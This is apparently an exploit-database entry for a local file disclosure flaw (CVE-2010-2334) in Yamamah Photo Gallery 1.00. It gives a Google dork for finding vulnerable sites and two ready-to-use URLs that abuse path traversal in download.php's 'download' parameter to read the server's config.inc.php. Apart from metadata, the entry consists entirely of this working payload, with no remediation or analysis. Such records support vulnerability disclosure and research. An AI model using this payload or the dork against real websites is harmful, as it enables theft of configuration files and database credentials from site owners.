Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure

Author: mat
type: webapps
platform: php
port: 
date_added: 2010-06-12 
date_updated:  
verified: 1 
codes: CVE-2010-2334;OSVDB-65479 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comyamamah_v1.rar

|=---------------------------------------------------------------------------=|
 Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
|=---------------------------------------------------------------------------=|
|=------------------------------=[ by mat ]=---------------------------------=|

Google dork: "Powered By : Yamamah Version 1.00"


http://[target]/[path]/themes/default/download.php?download=[File Disclosure]
http://[target]/[path]/themes/default/download.php?download=../../includes/config.inc.php